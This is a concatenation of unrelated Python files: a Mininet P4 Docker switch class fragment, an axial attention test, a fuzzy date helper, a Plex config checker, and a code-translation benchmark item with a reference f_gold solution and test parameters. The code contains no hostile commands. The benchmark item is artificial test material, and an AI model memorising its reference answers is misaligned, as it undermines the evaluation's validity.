# print ^A{pid}\n{sentinel}
cmd += ' printf "\\001%d\\012" $! '
else:
pass
self.write( cmd + '\n' )
self.lastPid = None
self.waiting = True
def popen( self, *args, **kwargs ):
mncmd = [ 'docker', 'exec', "mininet-"+self.name ]
return Switch.popen( self, *args, mncmd=mncmd, **kwargs )
def stop( self ):
dev_null = open(os.devnull, 'w')
subprocess.call( ['docker stop mininet-' + self.name],
stdin=dev_null, stdout=dev_null,
stderr=dev_null, shell=True )
subprocess.call( ['docker rm mininet-' + self.name],
stdin=dev_null, stdout=dev_null,
stderr=dev_null, shell=True )
dev_null.close()
def terminate( self ):
self.stop()
def start( self, controllers ):
print "Starting P4 docker switch", self.name
path = '/p4factory/targets/switch/behavioral-model'
args = [ 'echo \"' + path ]
args.extend( ['--name', self.name] )
args.extend( ['--dpid', self.dpid] )
args.extend( ['--pd-server', '127.0.0.1:22000'] )
if not self.pcap_dump:
args.append( '--no-pcap' )
for intf in self.intfs.values():
if not intf.IP():
args.extend( ['-i', intf.name] )
args.extend( ['--pps', self.pps] )
args.extend( ['--qdepth', self.qdepth] )
# Enable it for verbose logs from model
#args.append( '-t' )
args.append( '--no-veth' )
args.append( '>& /tmp/model.log &' )
args.append( '\" >> /p4factory/tools/bm_start.sh' )
self.cmd( args )
bm_cmd = ['docker', 'exec', 'mininet-' + self.name,
'/p4factory/tools/bm_start.sh' ]
bmp = subprocess.Popen( bm_cmd, stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, close_fds=False )
bmp.wait()
def startShell( self ):
self.stop()
docker_name = self.target_name
args = ['docker', 'run', '-ti', '--rm', '--privileged=true']
args.extend( ['--hostname=' + self.name, '--name=mininet-' + self.name] )
if self.thrift_port is not None:
args.extend( ['-p', '%d:22000' % self.thrift_port] )
if self.sai_port is not None:
args.extend( ['-p', '%d:9092' % self.sai_port] )
if self.swapi_port is not None:
args.extend( ['-p', '%d:9091' % self.swapi_port] )
args.extend( ['-e', 'DISPLAY'] )
args.extend( ['-v', '/tmp/.X11-unix:/tmp/.X11-unix'] )
if self.config_fs is not None:
args.extend( ['-v',
os.getcwd() + '/' + self.config_fs + ':/configs'] )
args.extend( [docker_name, self.start_program] )
master, slave = pty.openpty()
self.shell = subprocess.Popen( args,
stdin=slave, stdout=slave, stderr=slave,
close_fds=True,
preexec_fn=os.setpgrp )
os.close( slave )
ttyobj = os.fdopen( master, 'rw' )
self.stdin = ttyobj
self.stdout = ttyobj
self.pid = self.shell.pid
self.pollOut = select.poll()
self.pollOut.register( self.stdout )
self.outToNode[ self.stdout.fileno() ] = self
self.inToNode[ self.stdin.fileno() ] = self
self.execed = False
self.lastCmd = None
self.lastPid = None
self.readbuf = ''
self.waiting = False
#Wait for prompt
time.sleep(1)
pid_cmd = ['docker', 'inspect', '--format=\'{{ .State.Pid }}\'',
'mininet-' + self.name ]
pidp = subprocess.Popen( pid_cmd, stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, close_fds=False )
pidp.wait()
ps_out = pidp.stdout.readlines()
self.pid = int(ps_out[0])
self.cmd( 'export PS1=\"\\177\"; printf "\\177"' )
self.cmd( 'stty -echo; set +m' )
|
tests/test_axial_att_block.py | Siyuan89/self-attention-cv | 759 | 47574 | <reponame>Siyuan89/self-attention-cv
import torch
from self_attention_cv import AxialAttentionBlock
def test_axial_att():
device = 'cuda' if torch.cuda.is_available() else 'cpu'
model = AxialAttentionBlock(in_channels=256, dim=64, heads=8).to(device)
x = torch.rand(1, 256, 64, 64).to(device) # [batch, tokens, dim, dim]
y = model(x)
assert y.shape == x.shape
print('AxialAttentionBlockAISummer OK')
|
common/util/dates.py | jmcollis/GitSavvy | 2,058 | 47586 | <reponame>jmcollis/GitSavvy
from datetime import datetime
TEN_MINS = 600
ONE_HOUR = 3600
TWO_HOURS = 7200
ONE_DAY = 86400
def fuzzy(event, base=None, date_format=None):
if not base:
base = datetime.now()
if date_format:
event = datetime.strptime(event, date_format)
elif type(event) == str:
event = datetime.fromtimestamp(int(event))
elif type(event) == int:
event = datetime.fromtimestamp(event)
elif type(event) != datetime:
raise Exception(
"Cannot convert object `{}` to fuzzy date string".format(event))
delta = base - event
if delta.days == 0:
if delta.seconds < 60:
return "{} seconds ago".format(delta.seconds)
elif delta.seconds < 120:
return "1 min and {} secs ago".format(delta.seconds - 60)
elif delta.seconds < TEN_MINS:
return "{} mins and {} secs ago".format(
delta.seconds // 60,
delta.seconds % 60)
elif delta.seconds < ONE_HOUR:
return "{} minutes ago".format(delta.seconds // 60)
elif delta.seconds < TWO_HOURS:
return "1 hour and {} mins ago".format(
delta.seconds % ONE_HOUR // 60)
return "over {} hours ago".format(delta.seconds // ONE_HOUR)
elif delta.days < 2:
return "over a day ago"
elif delta.days < 7:
return "over {} days ago".format(delta.days)
return "{date:%b} {date.day}, {date.year}".format(date=event)
|
app/scripts/config_check.py | PromoFaux/plex-utills | 179 | 47591 | #!/usr/local/bin/python3
import os
import subprocess
from subprocess import Popen, PIPE, STDOUT
from configparser import ConfigParser
import subprocess
import plexapi
import schedule
import time
from datetime import datetime
import re
from colorama import Fore, Back, Style
import socket
from urllib import parse
from plexapi.server import PlexServer
config_object = ConfigParser()
config_object.read("/config/config.ini")
server = config_object["PLEXSERVER"]
schedules = config_object["SCHEDULES"]
options = config_object["OPTIONS"]
hdr_4k_posters = str.lower((options["4k_hdr_posters"]))
poster_3d = str.lower((options["3D_posters"]))
Disney = str.lower((options["Disney"]))
Pixar = (str.lower(options["Pixar"]))
hide_4k = str.lower((options["hide_4k"]))
pbak = str.lower((options["POSTER_BU"]))
HDR_BANNER = str.lower((options["HDR_BANNER"]))
optimise = str.lower((options["transcode"]))
mini_4k = str.lower((options["mini_4k"]))
mini_3d = str.lower((options["mini_3D"]))
t1 = (schedules["4k_poster_schedule"])
t2 = (schedules["disney_schedule"])
t3 = (schedules["pixar_schedule"])
t4 = (schedules["hide_poster_schedule"])
t5 = (schedules["3d_poster_schedule"])
url = parse.urlparse(server["PLEX_URL"]).hostname
try:
url = parse.urlparse(server["PLEX_URL"]).hostname
socket.inet_aton(url)
except socket.error:
raise Exception("Uh-Oh, it looks like your PLEX_URL is not correct in the config file \n Make sure you enter it as 'http://ip-address:plex-port'")
if server["TOKEN"] == '<token>':
raise Exception("You must add your Plex Token to the config file.")
try:
print("Your Server's Friendly name is ", PlexServer((server["PLEX_URL"]), (server["TOKEN"])).friendlyName)
except :
print('Cannot access your Plex account, please make sure that your Plex URL and Token are correct')
exit()
if pbak == 'true':
pass
elif pbak == 'false':
pass
else:
raise ValueError('SYNTAX ERROR: Please enter either "true" or "false" to set the script behaviour.')
if HDR_BANNER == 'true':
pass
elif HDR_BANNER == 'false':
pass
else:
raise ValueError('SYNTAX ERROR: Please enter either "true" or "false" to set the script behaviour.')
if mini_4k == 'true':
pass
elif mini_4k == 'false':
pass
else:
raise ValueError('SYNTAX ERROR: Please enter either "true" or "false" to set the script behaviour.')
if hdr_4k_posters == 'true':
pass
elif hdr_4k_posters == 'false':
pass
else:
raise ValueError('SYNTAX ERROR: Please enter either "true" or "false" to set the script behaviour.')
if poster_3d == 'true':
pass
elif poster_3d == 'false':
pass
else:
raise ValueError('SYNTAX ERROR: Please enter either "true" or "false" to set the script behaviour.')
if Disney == 'true':
pass
elif Disney == 'false':
pass
else:
raise ValueError('SYNTAX ERROR: Please enter either "true" or "false" to set the script behaviour.')
if Pixar == 'true':
pass
elif Pixar == 'false':
pass
else:
raise ValueError('SYNTAX ERROR: Please enter either "true" or "false" to set the script behaviour.')
if hide_4k == 'true':
pass
elif hide_4k == 'false':
pass
else:
raise ValueError('SYNTAX ERROR: Please enter either "true" or "false" to set the script behaviour.')
if optimise == 'true':
pass
elif optimise == 'false':
pass
else:
raise ValueError('SYNTAX ERROR: Please enter either "true" or "false" to set the script behaviour.')
a = re.compile("^[0-9]{2}:[0-9]{2}$")
if a.match(t1) and hdr_4k_posters == 'true':
pass
elif hdr_4k_posters != 'true':
pass
else:
raise ValueError('Please make sure that your scheduled times are written in the format HH:MM')
if a.match(t5) and poster_3d == 'true':
pass
elif poster_3d != 'true':
pass
else:
raise ValueError('Please make sure that your scheduled times are written in the format HH:MM')
if a.match(t2) and Disney == 'true':
pass
elif Disney != 'true':
pass
else:
raise ValueError('Please make sure that your scheduled times are written in the format HH:MM')
if a.match(t3) and Pixar == 'true':
pass
elif Pixar != 'true':
pass
else:
raise ValueError('Please make sure that your scheduled times are written in the format HH:MM')
if a.match(t4) and hide_4k == 'true':
pass
elif hide_4k != 'true':
pass
else:
raise ValueError('Please make sure that your scheduled times are written in the format HH:MM')
print('Config check passed')
p = Popen('python -u ./run_all.py', shell=True)
output = p.communicate()
print(output[0])
|
data/transcoder_evaluation_gfg/python/COUNT_PAIRS_TWO_SORTED_ARRAYS_WHOSE_SUM_EQUAL_GIVEN_VALUE_X_2.py | mxl1n/CodeGen | 241 | 47659 | <gh_stars>100-1000
# Copyright (c) 2019-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
def f_gold ( arr1 , arr2 , m , n , x ) :
count , l , r = 0 , 0 , n - 1
while ( l < m and r >= 0 ) :
if ( ( arr1 [ l ] + arr2 [ r ] ) == x ) :
l += 1
r -= 1
count += 1
elif ( ( arr1 [ l ] + arr2 [ r ] ) < x ) :
l += 1
else :
r -= 1
return count
#TOFILL
if __name__ == '__main__':
param = [
([5, 5, 7, 10, 14, 14, 17, 21, 32, 34, 37, 40, 40, 40, 46, 46, 50, 50, 51, 55, 57, 62, 65, 67, 67, 69, 70, 70, 72, 73, 76, 77, 77, 78, 84, 85, 85, 86, 87, 88, 88, 89, 89, 90, 93, 99],[2, 5, 8, 8, 10, 12, 13, 15, 17, 18, 20, 20, 21, 27, 28, 31, 34, 37, 40, 46, 48, 52, 53, 54, 54, 58, 59, 60, 66, 68, 68, 69, 70, 71, 72, 73, 77, 77, 80, 84, 84, 92, 92, 95, 97, 97],28,29,23,),
([-84, 52, -34, 96, 16, 92, -64, -74],[-22, 26, -12, -54, 66, 86, 38, 76],6,5,7,),
([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],37,26,42,),
([60, 92, 42, 83, 55, 76, 29, 62],[71, 2, 74, 42, 80, 71, 26, 76],4,7,7,),
([-94, -94, -58, -40, -40, -26, -24, -22, -22, -22, -2, 0, 4, 8, 12, 16, 16, 18, 22, 32, 42, 44, 50, 58, 64, 78, 80, 90],[-86, -84, -78, -76, -72, -70, -62, -58, -54, -54, -50, -46, -44, -40, -30, -28, -16, -10, 10, 36, 36, 48, 70, 84, 84, 90, 94, 98],17,27,17,),
([0, 0, 1, 1, 1, 0, 0, 1, 1, 1],[1, 1, 1, 0, 1, 1, 0, 0, 0, 0],5,8,9,),
([1, 5, 7, 7, 7, 14, 15, 16, 17, 18, 18, 19, 20, 25, 27, 31, 36, 42, 47, 51, 56, 56, 56, 58, 58, 59, 63, 63, 63, 65, 66, 67, 76, 83, 93, 94, 97],[2, 3, 7, 8, 9, 10, 17, 18, 21, 28, 29, 29, 33, 35, 46, 47, 47, 49, 49, 49, 53, 56, 58, 59, 59, 60, 65, 67, 70, 78, 81, 85, 85, 87, 90, 92, 96],28,34,31,),
([78, -74, 52, 56, -8, 92, 14, 56, -72, -92, 32, -94, -26, -8, -66, 72, -24, 36, -84, -4, -68, 14, 78, 40, -82, -10, 16, 56, 6, -16, 30, 24, -32],[-74, 22, -14, -2, 36, 86, -70, -20, -76, -84, -40, -36, 42, 22, -60, -94, -18, 8, -14, -42, -68, 62, -60, 2, 40, -66, 68, 96, 70, 98, -38, -74, -92],16,30,24,),
([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],25,33,33,),
([17, 50, 65, 4, 19, 10, 45, 70, 76, 81, 28, 97, 55, 70, 38, 2, 40, 67, 36, 33, 6, 85, 25],[78, 92, 65, 23, 7, 94, 18, 4, 2, 53, 31, 58, 98, 18, 46, 16, 17, 92, 80, 92, 43, 70, 50],16,22,22,)
]
n_success = 0
for i, parameters_set in enumerate(param):
if f_filled(*parameters_set) == f_gold(*parameters_set):
n_success+=1
print("#Results: %i, %i" % (n_success, len(param))) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.